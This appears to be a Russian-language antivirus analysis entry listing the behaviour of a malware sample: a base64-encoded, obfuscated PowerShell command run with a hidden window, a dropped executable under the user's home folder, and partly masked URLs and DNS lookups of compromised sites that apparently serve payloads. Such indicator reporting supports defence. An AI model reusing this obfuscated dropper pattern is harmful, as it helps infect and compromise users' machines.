Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAG8AdABiAHAANwBzAD0AKAAnAFIAYgAnACsAJwA3AHIAJwArACgAJwBhACcAKwAnAHAAeQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAEUAUgBwAFIAbwBmAGkAbABFAFwAbgAzAH...
- %HOMEPATH%\n3txclb\g628_ua\jl3r22nx.exe
- %HOMEPATH%\n3txclb\g628_ua\jl3r22nx.exe
- http://th#####angemascot.com/wp-admin/NN/
- http://re###nds.studio/wp-admin/SP/
- http://1a#####ess-coach.com/cgi-bin/deg/
- http://za###moden.com/wp-admin/FVQ/
- http://we##vac.com/wp-content/se7/
- http://vi####usrangel.com/experimental/sQ/
- DNS ASK th#####angemascot.com
- DNS ASK re###nds.studio
- DNS ASK 1a#####ess-coach.com
- DNS ASK pe#####lizzabili.com
- DNS ASK za###moden.com
- DNS ASK we##vac.com
- DNS ASK vi####usrangel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAG8AdABiAHAANwBzAD0AKAAnAFIAYgAnACsAJwA3AHIAJwArACgAJwBhACcAKwAnAHAAeQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAEUAUgBwAFIAbwBmAGkAbABFAFwAbgAzAH...' (со скрытым окном)